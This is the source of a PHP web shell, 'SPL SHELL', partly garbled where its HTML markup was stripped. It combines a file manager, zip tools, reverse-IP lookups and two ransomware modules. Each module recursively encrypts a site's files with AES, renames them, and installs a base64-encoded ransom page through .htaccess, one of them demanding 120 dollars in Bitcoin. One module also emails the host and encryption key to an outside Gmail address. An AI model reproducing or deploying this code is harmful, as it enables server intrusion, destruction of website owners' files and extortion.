Zip Backup

Folder:


Save To:




"; if ($_POST['backup']) { $save = $_POST['save']; function Zip($source, $destination) { if (extension_loaded('zip') === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } else if (is_file($file) === true) { $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } } else if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return $zip->close(); } } return false; } Zip($_POST['dir'], $save); echo "Selesai , Save To $save"; } echo "

Unzip Manual

Zip Location:


Save To:




"; if ($_POST['extrak']) { $save = $_POST['save']; $zip = new ZipArchive; $res = $zip->open($_POST['dir']); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo 'Succes , Location : ' . $save . ''; } else { echo 'Gagal Cok :( Ntahlah !'; } } echo '
'; } elseif (isset($_GET[hex('spl-ransom')])) { ?> SPL R4N50M3W4R3
.htaccess (Default Page)
'; } if(file_put_contents("shor7cut.php", base64_decode("PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgPHRpdGxlPlNQTCBSNE41ME0zVzRSMzwvdGl0bGU+CjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CmJvZHkgewogICAgYmFja2dyb3VuZDogIzFBMUMxRjsKICAgIGNvbG9yOiAjZTJlMmUyOwp9CmF7CiAgIGNvbG9yOmdyZWVuOwp9Cjwvc3R5bGU+CjwvaGVhZD4KPGJvZHk+CjxjZW50ZXI+CjxwcmU+CiAgICAgIAogICAgICAgICAgeHh4eHh4eCAgICAgICAgICAgICAgICAgbW1tbW1tbW1tbW1tICAgICAgICAgICAgICAgCiAgICAgICAgIHh4eCAgIHh4eCAgICAgICAgICAgICAgIG1tbSAgICAgICAgbW1tICAgICAgICAgICAgICAKICAgIHh4eHh4eHggICAgIHh4eHh4eHggICAgICAgICBtbSAgICAgICAgICAgIG1tICAgICAgICAgICAgIAogICAgeHggICB4eHggICB4eHggICB4eCAgICAgICAgIG1tICAgICAgICAgICAgbW0gICAgICAgICAgICAgCiAgICB4eCAgICAgeHh4eHh4eCAgICAgeHggICAgICAgbW0gICAgICAgICAgICAgIG1tICAgICAgICAgICAgCiAgICAgeHggICB4eHh4eHh4eHggICB4eCAgICAgICAgbW0gICAgICAgICAgICAgIG1tICAgICAgICAgICAgCiAgICAgIHh4eHh4IHh4eHh4IHh4eHh4ICAgICAgICAgbW0gICAgICAgICAgICAgIG1tICAgICAgICAgICAgCiAgICAgICAgICAgIHh4eHh4ICAgICAgICAgICAgICAgbW0gICAgICAgICAgICAgIG1tICAgICAgICAgICAgCiAgICAgICAgICAgICB4eHh4eCAgICAgICAgICAgICAgVVVVVVVVVVVVVVVVVVVVVVVVVVUgICAgICAgICAgIAogICAgICAgICAgICAgeHh4eHggICAgICAgICAgICAgIFVVVVVVVVVVVVVVVVVVVVVVVVVVICAgICAgICAgICAKICAgICAgICAgICAgIHh4eHh4ICAgICAgICAgICAgICBVVVVVVVVVVVUgICBVVVVVVVVVVSAgICAgICAgICAgCiAgICAgICAgICAgICB4eHh4eCAgICAgICAgICAgICAgVVVVVVVVVVUgICAgIFVVVVVVVVUgICAgICAgICAgIAogICAgICAgICAgICAgeHh4eHggICAgICAgICAgICAgIFVVVVVVVVVVVSAgIFVVVVVVVVVVICAgICAgICAgICAKICAgICAgICAgICAgIHh4eHh4ICAgICAgICAgICAgICAgVVVVVVVVVUkgICBJVVVVVVVVICAgICAgICAgICAgCiAgICAgICAgICAgICB4eHh4eCAgICAgICAgICAgICAgIFVVVVVVVVVJICAgSVVVVVVVVSAgICAgICAgICAgIAogICAgICAgICAgeHh4eHh4eHggICAgICAgICAgICAgICAgVVVVVVVVVXV1dVVVVVVVVSAgICAgICAgICAgICAKICAgICAgICAgIHh4eHh4eHh4ICAgICAgICAgICAgICAgICBVVVVVVVVVVVVVVVVVVSAgICAgICAgICAgICAgCiAgICAgICAgICAgICB4eHh4eCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgeHh4eHh4eHggICAgICAgICAgICAgIFNQTCBSNE41ME0zVzRSMyAgICAgICAgICAgIAogICAgICAgICAgeHh4eHh4eHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICB4eHh4eCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAoKWW91ciBzaXRlIGlzIGxvY2tlZCwgcGxlYXNlIGNvbnRhY3QgdmlhIGVtYWlsOgogICAgIC1bIDxmb250IGNvbG9yPSJncmVlbiI+aW5kb25lc2lhbndlYjExMDlbYXRdZ21haWwuY29tPC9mb250PiBdLQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tClRoaXMgaXMgYSBub3RpY2Ugb2YgPGEgaHJlZj0iaHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUmFuc29td2FyZSI+cmFuc29td2FyZTwvYT4uPGJyPgpIb3cgdG8gcmVzdG9yZSB0aGUgYmVnaW5uaW5nPwpQbGVhc2UgY29udGFjdCB1cyB2aWEgZW1haWwgbGlzdGVkCjwvcHJlPgo8L2NlbnRlcj4KPC9ib2R5Pgo8L2h0bWw+"))){ echo ' shor7cut.php (Default Page)
'; } } } public function shcpackUnstall(){ if( file_exists(".htashor7cut") ){ if( unlink(".htaccess") && unlink("shor7cut.php") ){ echo ' .htaccess (Default Page)
'; echo ' shor7cut.php (Default Page)
'; } rename(".htashor7cut", ".htaccess"); } } public function plus(){ flush(); ob_flush(); } public function locate(){ return getcwd(); } public function shcdirs($dir,$method,$key){ switch ($method) { case '1': deRanSomeware::shcpackInstall(); break; case '2': deRanSomeware::shcpackUnstall(); break; } foreach(scandir($dir) as $d) { if($d!='.' && $d!='..') { $locate = $dir.DIRECTORY_SEPARATOR.$d; if(!is_dir($locate)){ if( deRanSomeware::kecuali($locate,"SPL R4N50M3W4R3.php") && deRanSomeware::kecuali($locate,".png") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"shor7cut.php") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htashor7cut") ){ switch ($method) { case '1': deRanSomeware::shcEnCry($key,$locate); deRanSomeware::shcEnDesDirS($locate,"1"); break; case '2': deRanSomeware::shcDeCry($key,$locate); deRanSomeware::shcEnDesDirS($locate,"2"); break; } } }else{ deRanSomeware::shcdirs($locate,$method,$key); } } deRanSomeware::plus(); } deRanSomeware::report($key); } public function report($key){ $message.= "========= SPL R4N50M3W4R3 =========\n"; $message.= "Website : ".$_SERVER['HTTP_HOST']; $message.= "Key : ".$key; $message.= "========= SPL (2020) R4N50M3W4R3 =========\n"; $subject = "Report Ransomeware"; $headers = "From: Ransomware \r\n"; mail("oresanrei@gmail.com",$subject,$message,$headers); } public function shcEnDesDirS($locate,$method){ switch ($method) { case '1': rename($locate, $locate.".shor7cut"); break; case '2': $locates = str_replace(".shor7cut", "", $locate); rename($locate, $locates); break; } } public function shcEnCry($key,$locate){ $data = file_get_contents($locate); $iv = mcrypt_create_iv( mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM ); $encrypted = base64_encode( $iv . mcrypt_encrypt( MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data, MCRYPT_MODE_CBC, $iv ) ); if(file_put_contents($locate, $encrypted )){ echo ' Locked (Success) | '.$locate.'
'; }else{ echo ' Locked (Failed) | '.$locate.'
'; } } public function shcDeCry($key,$locate){ $data = base64_decode( file_get_contents($locate) ); $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)); $decrypted = rtrim( mcrypt_decrypt( MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv ), "\0" ); if(file_put_contents($locate, $decrypted )){ echo ' Unlock (Success) | '.$locate.'
'; }else{ echo ' Unlock (Failed) | '.$locate.'
'; } } public function kecuali($ext,$name){ $re = "/({$name})/"; preg_match($re, $ext, $matches); if($matches[1]){ return false; } return true; } } if($_POST['submit']){ switch ($_POST['method']) { case '1': deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST['key']); break; case '2': deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST['key']); break; } }else{ ?> 
          xxxxxxx                 mmmmmmmmmmmm               
         xxx   xxx               mmm        mmm              
    xxxxxxx     xxxxxxx         mm            mm             
    xx   xxx   xxx   xx         mm            mm             
    xx     xxxxxxx     xx       mm              mm            
     xx   xxxxxxxxx   xx        mm              mm            
      xxxxx xxxxx xxxxx         mm              mm            
            xxxxx               mm              mm            
             xxxxx              UUUUUUUUUUUUUUUUUUUU           
             xxxxx              UUUUUUUUUUUUUUUUUUUU           
             xxxxx              UUUUUUUUU   UUUUUUUU           
             xxxxx              UUUUUUUU     UUUUUUU           
             xxxxx              UUUUUUUUU   UUUUUUUU           
             xxxxx               UUUUUUUI   IUUUUUU            
             xxxxx               UUUUUUUI   IUUUUUU            
          xxxxxxxx                UUUUUUUuuuUUUUUU             
          xxxxxxxx                 UUUUUUUUUUUUUU              
             xxxxx                                             
          xxxxxxxx                     
          xxxxxxxx                                                       
             xxxxx                                             

        SPL R4N50M3W4R3
 -[ Contact : oresanrei[at]gmail.com ]-

Reverse IP SPL SHELL

[ Reverse IP Lookup ]

')) { echo '

Mohon Maaf Karena Tools Ransomware Hanya bisa berjalan di PHP versi 7.2 ke bawah saja . untuk PHP versi 7.2 ke atas masih tahap pembuatan '; exit; } ?>
ҳ̸Ҳ̸ҳ SPL R4N5 TROJAN ҳ̸Ҳ̸ҳ .htaccess (Default Page)
'; } if(file_put_contents("virus.php", base64_decode("PGh0bWw+DQo8Ym9keT4NCjxoZWFkPg0KDQo8dGl0bGU+RW5jcnlwdGVkITwvdGl0bGU+DQoNCjwvaGVhZD4NCjxsaW5rIHJlbD0iaWNvbiIgdHlwZT0iaW1hZ2UvZ2lmIiBocmVmPSJodHRwczovL3MtbWVkaWEtY2FjaGUtYWswLnBpbmltZy5jb20vMjM2eC9hNy83Ni9lYy9hNzc2ZWM1MmU1NzVkMDQ3M2QzMzU1N2FhNjEwZTQ3ZC0tc2t1bGwtZmFzaGlvbi1mbG93ZXItdGF0dG9vcy5qcGciPg0KPGJvZHkgYmdjb2xvciA9ICdibGFjayc+DQo8Y2VudGVyPg0KDQo8c3R5bGUgdHlwZT0ndGV4dC9jc3MnPmJvZHksIGEsIGE6bGlua3tjdXJzb3I6dXJsKGh0dHA6Ly80LmJwLmJsb2dzcG90LmNvbS8taEFGN3RQVW5tRUUvVHdHUjNsUkgwRUkvQUFBQUFBQUFBczgvNnBraTIyaGMzTkUvczE2MDAvYXNzLnBuZyksIGRlZmF1bHQ7fSBhOmhvdmVyIHtjdXJzb3I6dXJsKGh0dHA6Ly8zLmJwLmJsb2dzcG90LmNvbS8tYlJpa2dxZVp4MFEvVHdHUjRNVUVDN0kvQUFBQUFBQUFBdEEvaXNKbVMwcjM1UXcvczE2MDAvcG9pbnRlci5wbmcpLHdhaXQ7fTwvc3R5bGU+DQo8cHJlIHN0eWxlPSJmb250OiAxMnB4LzEycHggbW9ub3NwYWNlOyI+PGZvbnQgY29sb3IgPSAncmVkJz4NCnV1dXV1dXUNCnV1JCQkJCQkJCQkJCR1dQ0KdXUkJCQkJCQkJCQkJCQkJCQkJHV1DQp1JCQkJCQkJCQkJCQkJCQkJCQkJCQkdQ0KdSQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkdQ0KdSQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCR1DQp1JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJHUNCnUkJCQkJCQiICAgIiQkJCIgICAiJCQkJCQkdQ0KIiQkJCQiICAgICAgdSR1ICAgICAgICQkJCQiDQokJCR1ICAgICAgIHUkdSAgICAgICB1JCQkDQokJCR1ICAgICAgdSQkJHUgICAgICB1JCQkDQoiJCQkJHV1JCQkICAgJCQkdXUkJCQkIg0KIiQkJCQkJCQiICAgIiQkJCQkJCQiDQp1JCQkJCQkJHUkJCQkJCQkdQ0KdSQiJCIkIiQiJCIkIiR1DQp1dXUgICAgICAgICQkdSQgJCAkICQgJHUkJCAgICAgICB1dXUNCnUkJCQkICAgICAgICAkJCQkJHUkdSR1JCQkICAgICAgIHUkJCQkDQogJCQkJCR1dSAgICAgICIkJCQkJCQkJCQiICAgICB1dSQkJCQkJA0KIHUkJCQkJCQkJCQkJHV1ICAgICIiIiIiICAgIHV1dXUkJCQkJCQkJCQkDQogICAkJCQkIiIiJCQkJCQkJCQkJHV1dSAgIHV1JCQkJCQkJCQkIiIiJCQkIg0KIiIiICAgICAgIiIkJCQkJCQkJCQkJHV1ICIiJCIiIiAgICAgDQogICAgdXV1dSAiIiQkJCQkJCQkJCR1dXUNCiAgICB1JCQkdXV1JCQkJCQkJCQkdXUgIiIkJCQkJCQkJCQkJHV1dSQkJA0KICAgICAkJCQkJCQkJCQkIiIiIiAgICAgICAgICAgIiIkJCQkJCQkJCQkJCINCiAgICAgICIkJCQkJCIgICAgICAgICAgICAgICAgICAgICAgIiIkJCQkIiINCiAgICAgICAkJCQiICAgICAgICAgICAgICAgICAgICAgICAgICQkJCQiDQo8L3ByZT48L2ZvbnQ+DQo8bGluayBocmVmPSdodHRwOi8vZm9udHMuZ29vZ2xlYXBpcy5jb20vY3NzP2ZhbWlseT1JY2VsYW5kJyByZWw9J3N0eWxlc2hlZXQnIHR5cGU9J3RleHQvY3NzJz4NCjxmb250IGZhY2U9ImljZWxhbmQiIHNpemU9IjEwIiBjb2xvciA9ICdyZWQnPllvdXIgV2Vic2l0ZSBIYXZlIEJlZW4gRW5jcnlwdGVkISA8YnI+DQo8Zm9udCBzaXplID0gJzYnPkJ5IDxicj5FeG9yY2lzbSAmIFNlY3VyaXR5X0h1bnRlcno8L2ZvbnQ+PGJyPjwvZm9udD48YnI+DQo8Zm9udCBmYWNlID0gJ2ljZWxhbmQnIHNpemUgPSAnNicgY29sb3IgPSAnd2hpdGUnPldoYXQgSGFwcGVuZWQgVG8gWW91ciBXZWJzaXRlPyANCgkJPGJyPjxicj4gDQoJCTxmb250IHNpemU9JzUnIGNvbG9yID0gJ3JlZCc+WW91ciBpbXBvcnRhbnQgd2Vic2l0ZSBmaWxlcyBhcmUgZW5jcnlwdGVkLjxicj4NCgkJPGZvbnQgY29sb3I9J3doaXRlJz4NCgkJTWFueSBvZiB5b3VyIC5waHAsIC5jc3MsIC5qcywgYW5kIG90aGVyIGZpbGVzIGFyZSBubyBsb25nZXIgYWNjZXNzaWJlbA0KCQliZWNhdXNlIHRoZXkgaGF2ZSBiZWVuIGVuY3J5cHRlZC4gPGJyPk1heWJlIHlvdSBhcmUgYnVzeSBsb29raW5nIGZvciBhIHdheSB0byANCgkJcmVjb3ZlciB5b3VyIGZpbGVzLDxicj4gYnV0IGRvIG5vdCB3YXN0ZSB5b3VyIHRpbWUhPGJyPiBOb2JvZHkgY2FuIGRlY3J5cHQgeW91ciBmaWxlcw0KCQl3aXRob3V0IG91ciBzcGVjaWFsIGRlY3J5cHRpb24gc2VydmljZS4gPGJyPg0KDQoJCTxmb250IENvbG9yID0gJ3JlZCc+RG8gTm90IFRyeSBUbyBEZWNyeXB0IEJ5IFlvdXIgU2VsZiwgT3IgWW91ciBGaWxlcyBXaWxsIEJlIERlbGV0ZWQgQXV0b21hdGljYWxseS4gPGJyPjxicj4NCgkJCTxmb250IGNvbG9yID0nd2hpdGUnIHNpemU9IjYiPiBIb3cgdG8gcmVjb3ZlciB5b3VyIHdlYnNpdGU/IDxicj48Zm9udCBzaXplID0gJzUnPg0KCQkJU3VyZSwgd2UgZ3VhcmFudGVlIHRoYXQgeW91IGNhbiByZWNvdmVyIGFsbCB5b3VyIGZpbGVzIHNhZmVseSBhbmQgZWFzaWx5LiBCdXQgeW91IGhhdmUgbm90IGVub3VnaCB0aW1lLjxicj4NCgkJCXdlIGNhbiBkZWNyeXB0IGFsbCB5b3VyIHdlYnNpdGUgZmlsZSBzYWZlbHksIGhvdyA/IFlvdSBNdXN0IFBheSBpdCB3aXRoPGZvbnQgY29sb3I9InJlZCI+IDEyMCRCaXRjb2luPC9mb250Pjxicj4NCgkJCUlmIHlvdSBuZWVkIG91ciBhc3Npc3RhbmNlLCBZb3UgY2FuIGNvbnRhY3QgdXMgdmlhIGVtYWlsOi1bRXhvcmNpc200MDRAaGFja2VybWFpbC5jb21dLSA8YnI+PGJyPg0KCQkJQWZ0ZXIgWW91IFBheSBpdC4gV2UgV2lsbCBEZWNyeXB0IFRoZSBFbmNyeXB0ZWQgRmlsZXMgSW4gWW91ciBXZWJzaXRlLg0KCQk8L2ZvbnQ+DQoJCTxicj4NCgkJPGJyPg0KDQoNCg0KDQoNCjwvY2VudGVyPg0KPC9ib2R5Pg0KDQoNCjwvaHRtbD4="))){ echo ' virus.php (Default Page)
'; } } } public function shcpackUnstall(){ if( file_exists(".htaencrypted") ){ if( unlink(".htaccess") && unlink("virus.php") ){ echo ' .htaccess (Default Page)
'; echo ' virus.php (Default Page)
'; } rename(".htaencrypted", ".htaccess"); } } public function plus(){ flush(); ob_flush(); } public function locate(){ return getcwd(); } public function shcdirs($dir,$method,$key){ switch ($method) { case '1': deRanSomeware::shcpackInstall(); break; case '2': deRanSomeware::shcpackUnstall(); break; } foreach(scandir($dir) as $d) { if($d!='.' && $d!='..') { $locate = $dir.DIRECTORY_SEPARATOR.$d; if(!is_dir($locate)){ if( deRanSomeware::kecuali($locate,"idx.php") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"virus.php") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htaencrypted") ){ switch ($method) { case '1': deRanSomeware::shcEnCry($key,$locate); deRanSomeware::shcEnDesDirS($locate,"1"); break; case '2': deRanSomeware::shcDeCry($key,$locate); deRanSomeware::shcEnDesDirS($locate,"2"); break; } } }else{ deRanSomeware::shcdirs($locate,$method,$key); } } deRanSomeware::plus(); } } public function shcEnDesDirS($locate,$method){ switch ($method) { case '1': rename($locate, $locate.".TheSploit"); break; case '2': $locates = str_replace(".TheSploit", "", $locate); rename($locate, $locates); break; } } public function shcEnCry($key,$locate){ $data = file_get_contents($locate); $iv = mcrypt_create_iv( mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM ); $encrypted = base64_encode( $iv . mcrypt_encrypt( MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data, MCRYPT_MODE_CBC, $iv ) ); if(file_put_contents($locate, $encrypted )){ echo ' Locked (Success) | '.$locate.'
'; }else{ echo ' Locked (Failed) | '.$locate.'
'; } } public function shcDeCry($key,$locate){ $data = base64_decode( file_get_contents($locate) ); $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)); $decrypted = rtrim( mcrypt_decrypt( MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv ), "\0" ); if(file_put_contents($locate, $decrypted )){ echo ' Unlock (Success) | '.$locate.'
'; }else{ echo ' Unlock (Failed) | '.$locate.'
'; } } public function kecuali($ext,$name){ $re = "/({$name})/"; preg_match($re, $ext, $matches); if($matches[1]){ return false; } return true; } } if($_POST['submit']){ switch ($_POST['method']) { case '1': deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST['key']); break; case '2': deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST['key']); break; } }else{ ?> 

  _____ _____ __       _____ _____ _____    __ _____ _____   _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ 
|   __|  _  |  |     |_   _| __  |     |__|  |  _  |   | |   | __  |  _  |   | |   __|     |     | | | |  _  | __  |   __|
|__   |   __|  |__     | | |    -|  |  |  |  |     | | | |   |    -|     | | | |__   |  |  | | | | | | |     |    -|   __|
|_____|__|  |_____|    |_| |__|__|_____|_____|__|__|_|___|   |__|__|__|__|_|___|_____|_____|_|_|_|_____|__|__|__|__|_____|

                                                                                                                                                          
                                                                                                                                                          

               .                                                      .
        .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
         )b.  .dbo.dP'`v'`9b.odb.  .dX(
       ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
      dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
      dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
      9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
       `'      9XXXXXX(   )XXXXXXP      `'
	XXXX X.`v'.X XXXX
         XP^X'`b   d'`X^XX
         X. 9  `   '  P )X
         `b  `       '  d'
         `             '
		 
	 
 -[ Contact : oresanrei@gmail.com ]-
 
 System :  
 Server : 
 #Ransomware Ini Berada Pada [dir]: /

Put Your Encryption/Decryption Key Here



Post Type :







',''); return $ip; flush(); } function sws_net_info($site) { $getip = @file_get_contents("http://networktools.nl/asinfo/$site"); $ip = @findit($getip,'
','
'); return $ip; flush(); } function sws_site_ser($site) { $getip = @file_get_contents("http://networktools.nl/reverseip/$site"); $ip = @findit($getip,'
','
'); return $ip; flush(); } function sws_sup_dom($site) { $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains"); $ip = @findit($getip,'Nameservers found:','"; } elseif (isset($_GET[hex('logout')])) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); print ""; } elseif(isset($_GET["n"])) { echo $a_.'+FILE'.$b_.' '.$d_.' '.$c_; if(isset($_POST["n"])) { if(!$GNJ[25]($_POST["n"])) { ER(); } else { OK(); } } } elseif(isset($_GET["r"])) { echo $a_.uhex($_GET["r"]).$b_.' '.$d_.' '.$c_; if(isset($_POST["r"])) { if($GNJ[26]($_POST["r"])) { ER(); } else { if($GNJ[27](uhex($_GET["r"]), $_POST["r"])) { OK(); } else { ER(); } } } } elseif(isset($_GET["z"])) { $zip = new ZipArchive; $res = $zip->open(uhex($_GET["z"])); if($res === TRUE) { $zip->extractTo(uhex($_GET["d"])); $zip->close(); OK(); } else { ER(); } } else { echo ' '; $h = ""; $j = ""; $w = $GNJ[13]($d); if($GNJ[28]($w) || $GNJ[29]($w)) { foreach($w as $c){ $e = $GNJ[14]("\\", "/", $d); if(!$GNJ[30]($c, ".zip")) { $zi = ''; } else { $zi = 'U'; } if($GNJ[31]("$d/$c")) { $o = ""; } elseif(!$GNJ[32]("$d/$c")) { $o = " h"; } else { $o = " w"; } $s = $GNJ[34]("$d/$c") / 1024; $s = round($s, 3); if($s>=1024) { $s = round($s/1024, 2) . " MB"; } else { $s = $s . " KB"; } if(($c != ".") && ($c != "..")){ ($GNJ[8]("$d/$c")) ? $h .= ' ' : $j .= ' '; } } } echo $h; echo $j; echo '
NAME
TYPE
SIZE
LAST MODIFIED
OWNER\GROUP
PERMISSION
ACTION
'.$c.'
Dir
-
'.$GNJ[20]("F d Y g:i:s", $GNJ[21]("$d/$c")).'
'.$dirinfo["owner"].DIRECTORY_SEPARATOR.$dirinfo["group"].'
'.x("$d/$c").'
Rename Delete
'.$c.'
File
'.$s.'
'.$GNJ[20]("F d Y g:i:s", $GNJ[21]("$d/$c")).'
'.$dirinfo["owner"].DIRECTORY_SEPARATOR.$dirinfo["group"].'
'.x("$d/$c").'
Edit Rename Download '.$zi.' Delete
'; } ?>
© RECODED BY SPL